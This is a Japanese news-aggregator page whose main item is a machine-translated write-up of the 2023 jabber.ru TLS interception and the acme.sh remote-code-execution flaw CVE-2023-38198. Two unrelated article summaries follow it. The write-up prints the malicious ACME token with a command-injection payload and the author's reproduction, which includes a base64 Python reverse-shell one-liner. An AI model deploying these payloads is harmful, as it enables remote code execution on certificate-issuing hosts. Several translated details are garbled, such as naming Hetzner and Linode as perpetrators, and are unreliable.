2026/05/31 4:47

合法なTLS盗聴の並列復元

RSS: https://news.ycombinator.com/rss

要約▶

Japanese Translation:

2023 年 4 月 18 日、jabber.ru の XMPP サービスが、TLS サーティフィケートを適切に更新せずに acme.sh を介して SSL/TLS サーティフィケートを発行し始め、警告と調査を引き起こした。その数日後、CVE-2023-38198：acme.sh における遠隔コード実行（RCE）の脆弱性が発見され、これは 2023 年 6 月 8 日に公開され、6 月 9 日にパッチ適用されたリリースが利用可能になった。根本原因は、ACME http-01 チャレンジトークン内でのシェル間投（shell interpolation）であり、具体的には base64 エンコードされたペイロードで構成されたファイル名に対する IFS（Input Field Separator）の不適切な処理およびコマンドインジェクションを許可する。これにより、ネットワークルーティングを制御できる攻撃者は、CA からのレスポンスを傍受し、任意のコードを実行することが可能となり、acme.sh クライアントは通常、発行時に elevated privileges（特権）を持って動作するため、被害者のマシン上でprivileged reverse shell がしばしば実行される。同様の期間に、「HiCA」という名称の CA 組織がこの脆弱性を悪用して TLS インターセプション用の偽造サーティフィケートを発行していることが観察された。この攻撃は、/tmp に残る Python3 インタプリタのプロセスが停止した状態やその痕跡という、再起動時に一般的に削除されるフォレンジックアティファクト以外には、極めて少ない痕跡を残す。国家支援された敵対者も多数の防御を迂回する可能性があるかもしれないが、Hugo Landau のような専門家によると、作業者側の不注意な運用慣行がない限り、被害者のマシンそのものを直接侵害することはunlikely（可能性は低い）とされる。このインシデントは、標準的な暗号化でも、サーティフィケート発行ツールに利用可能な脆弱性がある場合、プライバシーは保証されないと示しており、自動化されたサーティフィケート管理を依存している組織にとっての実在するリスクを浮き彫りにしている。

本文

運輸層セキュリティ（TLS）と CA トラストに関する分析：2023 年の事例から学んだ教訓

はじめに：TLS と信頼の連鎖

トランスポートレイヤーセキュリティ（TLS）プロトコルは、ブラウザ上に表示される「鍵アイコン」を提供する仕組みです。この機能の裏側には、暗号化のために多数の数値が使用されています。

秘密保持数値: 厳格な秘匿が求められるデータ
公開数値: プログラム上で問題なく共有できるデータ
信頼連鎖: 自らの数値と他者の数値を組み合わせ、信頼関係（Trusted Chain）を確立・検証する仕組み

この連鎖の頂点には、**疑いようのない信頼できる実体（ルート CA）**が存在し、そこから下位へのリンクもその信頼性を継承します。高レベルな解説では詳細が省略されることもありますが、原理的な理解は実際の動作の実行能力に直結します。

過去、法執行機関による正当な捜査において、ルート CA で署名された証明書を用いた TLS 通信の監聴（リスニング）が行われ、それが検証可能であることは複数の事例で実証済みです。

事例概要：2023 年の暗号化トラフィック的中断

イベント背景

対象: 大規模なロシア語圏 XMPP（Jabber）メッセンジングサービス「jabber.ru」
加害者: Hetzner および Linode
行為: 2023 年に行われた、暗号化トラフィックの無断取り込み（ミッドマン攻撃の一種）
状況:
- この事実は単なる陰謀論ではなく現実であったことが判明し、世間を騒がせた。
- 背後には運用上のミスによる皮肉な事態があった。
- TLS 証明書の更新が放置され、結果として巨大な警告ページが表示され、調査が誘発された（作戦の「自爆」）。

分析目的

本記事では、「事後知見（Hindsight）」を活かし、TLS の本来の機能を懸念しつつも、2023 年の文脈におけるシステム全体構成と成立メカニズムを検証・再現することを目的とする。

分析：時系列と要因

大きな出来事の重要性は明白ですが、「悪魔は細部に宿る」。事象を左から右へ読むのではなく、単語クラウド（概念群）として把握し、関連性を整理するアプローチが有効です。

重要タイムライン

日付	イベント内容
2023 年 4 月 18 日	不明な行動体が SSL/TLS 証明書の発行を開始（※運用ミスによる発端）
2023 年 4 月 25 日 - 2023 年 11 月 3 日	他の出来事が発生

核心的な要点: 2023 年 4 月 18 日の動きと、その際に関与した

acme.sh

の不足部分を明確にすること。

acme.sh と脆弱性の関係

ACME は認証局から TLS 証明書の発行・更新を行う信頼関係確立のプロトコルです。

acme.sh

はこれを自動化するシェルスクリプトです。

通常動作: タイマーにより有効期限切れ前に証明書を更新。
2023 年 4 月 18 日:
```
acme.sh
```
が攻撃された時期と一致。
関連脆弱性: 6 月 8 日に公開された遠隔コード実行（RCE）脆弱性 CVE-2023-38198。
- 対象:
```
HiCA
```
  という CA 認証局。
- パッチ提供日: 6 月 9 日。
- サーバー状態: 攻撃発端時（4 月 18 日）には未パッチ版が稼働中。

CVE-2023-38198 の技術詳細

GitHub の Issue 分析から、以下の要素が確認されました：

悪用経路: シェル埋め込み（Shell Interpolation）の欠如や、許可されない文字によるフィルタ回避。
データ不一致: ネットワーク送信データと ACME クライアント上の表示データの表現に乖離が存在。
Challenge オブジェクト:
```
Token
```
フィールド内に不正なコマンドが含まれるという異例事態が発生。

{
    "Type": "http-01",
    "URL": "../pki-validation",
    "Status": "pending",
    "Token": "dd#...$(curl IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`...)/bash)#"
}

技術的混乱の核心:

明確なスペース文字が許可されず、ネストされた構造が圧縮されている。
ACME サーバーの一部を改変し、ペイロードをミニファイ（圧縮）して操作しても動作しない。
```
IFS
```
（入力フィールドセパレーター）の再定義によるトリックは、現状の
```
acme.sh
```
の多層な前処理により不可能である。

結論: GitHub 上の記録とは異なるバージョン、または開発者による積極的なペイロード変更がなされていた可能性が高い。

DIY：自作実験と再現試み

GitHub に記載されたトークン応答では機能しなかったため、独自のアプローチで再構成を試みました。

試行錯誤の過程

IFS=^

によるセパレーター再定義だけでは機能せず、

echo|nl

を利用して単一ホワイトスペースを生成する手法を検討：

# ベース 64 で符号化された文字列をデコードし、Python3 の STDIN にパイプする
$(echo aW1p... | base64 -d | python3)

コードゴルフと Python リバースシェル

Linux のファイルパス最大長制限（255 バイト）を超えないようにするため、Python コードを極限まで压缩（コードゴルフ）し、ベース 64 で符号化：

remy@bigboi:~$ ls /tmp
'$(echo`echo|nl`aW1wb3J0IHNvY2tldCBhcyBzO2E9cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pO2EuY29ubmVjdCgoIjEyNy4wLjAuMSIsOTk5OSkpO2V4ZWMoYS5yZWN2KDQwOTYpKTsg`echo|nl`|`echo|nl`base64`echo|nl`-d|python3)'

ステージ 2：完全なインタプリタ起動

証明書更新時のリソースを悪用し、完全な Python インタープリタ上でシェルコマンドを実行：

import socket as s; a=s.socket(s.AF_INET,s.SOCK_STREAM); a.connect(("127.0.0.1",9999)); exec(a.recv(4096))

プロセスツリー:

sh ./acme.sh ... (PID 124643)
└─ python3 (PID 124647) ← ここでリバーシブルシェルが発生

まとめと教訓

今回の事件は、以下の複合要因による結果でした。

原因の要因

運用ミス: TLS 証明書の更新忘れのみならず、インターセプション（傍受）システムの撤廃忘れ。
脆弱性の存在: RCE 脆弱性（CVE-2023-38198）が利用可能であり、別のアクターによる積極的な悪用。
監聴の実装: ワイレットップャー（盗聴者）は既存証明書のコピーを用いて TLS インターセプションを行い、痕跡を残さず活動。

本質的な脆弱性

プロトコル自体には厳格さがありますが、プロトコルを実行するソフトウェア（例：
```
acme.sh
```
や Python 標準ライブラリ）が常に最も弱いリンクとなります。
リバースエンジニアリングにより過去の技術デバイスの墓地から確認できるように、長年にわたって脆弱性は残存しています。
悪意ある CA やネットワークルートの完全な影響がない限り到達できませんが、作業者が少しサボった場合、非常に簡易的な実行が可能で、神話や伝説として扱われるべき領域です。

今後の対策と考察

Hugo Landau の引用にある通り、「より能動的な国家演者（Mallory）がどのように行動するか」を考える必要があります。被害者のマシンを直接危害を加えるのではなく、証明書を更新するシステム自体に侵入し、無断で監聴可能な偽の信頼連鎖を構築するシナリオは常に可能です。

さらに詳細な事後分析や防衛策については以下の資料を参照してください：

事件の詳細分析: https://www.devever.net/~hl/xmpp-incident

同じ日のほかのニュース

一覧に戻る →

2026/05/31 8:26

マイクロソフトが永続ライセンス付きのオフライン製品の機能制限を実施

## Japanese Translation: 2026 年 7 月 13 日、Microsoft は macOS および iOS 向けに永続ライセンス付きの Office アプリに対して重要な制限を施行し、Word、Excel、PowerPoint、Outlook、OneDrive のライセンス証明書が期限切れになった時点でユーザーを閲覧専用モードにロックします。これにより、これらの特定のデバイスでの完全な編集機能は事実上終了し、2023 年のサポート終了日以降もデータ安全性が恒久的に維持されるとの以前のアシuranse と大きな決別を示します。Windows や Android バージョンはこの証明書問題の影響を受けない一方、この機能劣化は Apple ハードウェア上の古い永続ライセンスを特定して対象としています。ユーザーは現在のソフトウェアを再インストールしても問題を修復することはできず、代わりに無料の Web アプリへ移行するか、新しいサブスクリプションベースのライセンスを購入する（または Office Home 2024 永続ライセンスの可能性もある）、あるいは LibreOffice、OnlyOffice、Pages のような代替スイートへ切り替える必要があります。Microsoft は Office 2021 ユーザーに対して限られた解決策を提供しており、バージョン 16.83 以降へのアップグレードが可能で、これは 2026 年 10 月までの新たな証明書を含んでいます。しかし、サポート終了済み Office 2019 を実行している場合に必要な閾値未満のハードキャップのため、有効なアップデートパスは存在しません。Microsoft は 2026 年 5 月中旬から影響を受ける顧客へ電子メールを送信し、代替策として無料の Microsoft 365 Personal トライアルを提供しています。この動きは、業界全体の広範な傾向を浮き彫りにしており、永続ライセンスは継続的な有料サポートや特定の技術パッチなしに長期的な機能維持のためにはますます信頼性が低いという事実を示しています。

2026/05/31 5:40

専門分野の知見こそが、本物の護城河であった。

## Japanese Translation: ソフトウェア開発における核心的な変化は、システム構築と検証を分離する「エージェント型 AI」の台頭であり、これにより深いドメイン知識が生のコーディングスキルよりも新たな最重要資産となっています。従来のエンジニアは、失敗を観察したり専門家の影を追うことによりドメインを習得しましたが、この育成型の道筋は現在、多くの場合に封殺されています。今日のエージェントは、物流スケジュールや給与計算規則といった複雑な業界データを調和させることで得られる暗黙的理解を再現するのが困難です。そのため、特定のバックグラウンドを持たない一般向けエンジニアは、AI が生成したコードを効果的に検証することができず、コーディングを行わない者もこれらの強力なツールを効果的に活用できません。未来の景観では、機械的なコーディング能力と深い業界専門知識を併せ持ち、「二重判断」を行う専門家—すなわちコードの健全性と事実の正確性の両方を保証する人材—が優位に立つでしょう。AI による抽象モデルの機械的翻訳がもはや独占的ではなくなる中、現実世界の法規制の実証済みモデルこそが決定的な資産となります。この移行は物流配車オペレーターなどの役割を再定義し、清らかなコードの生成が主たる制約ではなくなった時代において、ドメインの複雑性に対する人間の洞察が不可欠であることを証明しています。 ## Text to translate: No significant improvements are needed as the original summary is concise, accurate, and comprehensive. ## Summary: The central shift in software development is the emergence of Agentic AI, which separates building systems from verifying them, making deep domain knowledge the new most valuable asset rather than raw coding skills. Unlike traditional engineers who learned domains by observing failures and shadowing experts—a developmental path now blocked for many—today's agents struggle to replicate the tacit understanding gained from reconciling complex industry data like logistics schedules or payroll rules. Consequently, generalist engineers cannot effectively verify AI-generated code without this specific background, while non-coders remain unable to leverage these powerful tools effectively. The future landscape favors professionals who combine mechanical coding proficiency with profound industry expertise to perform "double judgment," ensuring both code soundness and factual accuracy. As mechanical translation of abstract models becomes less exclusive due to AI, verified models of real-world regulations become the critical asset. This transition elevates roles like logistics dispatchers, proving that human insight into domain complexities is irreplaceable in an age where generating clean code is no longer the primary constraint.

2026/05/29 11:49

砂漠の真ん中に貝殻を見つけた

## Japanese Translation: サウジアラビアのアルガット砂漠の崖基部で発見された目立つ岩石は、海岸線近くにはなく、地質学的証拠によるとジュラ紀（約 1500 万年前）には海洋の底だった場所で、貝殻のように見える。地域のパレオントロジー専門家がいなかったため、著者は DIY データ分析を用いてその系統を同定した。ほぼ 8,000 の貝殻種を含むデータセット（Zhang et al.）において、著者は各輪郭を 256x2 マトリクスとして表現し、輪郭間の二乗ユークリッド距離を計算し、主成分分析（PCA）を適用した。得られた 2 次元潜在空間では、負の PC1 値は丸みを、正の値は尖り具合を示し、PC2 は対称性または質量分布を捕捉していた。化石は最も近似的に*Sphincterochila candidissima*に類似しており、これは約 3800 万年前にのみ出現した種であり、ジュラ紀にはいなかった。PCA に基づくと形状はほぼ同一だが、時間的ギャップにより直接的な祖先関係は否定され、代わりに収斂進化が示唆される：無縁の生物が同様の環境圧力の影響を受けて類似の形態を発達させた。このプロジェクトでは、また shell.hawzen.me というインタラクティブなツールを提供しており、これは遠隔地の非専門家でも専門的な科学ツールにアクセスできるようにし、研究の民主化と地球の歴史に関する深遠な事実の解明を実現することを示している。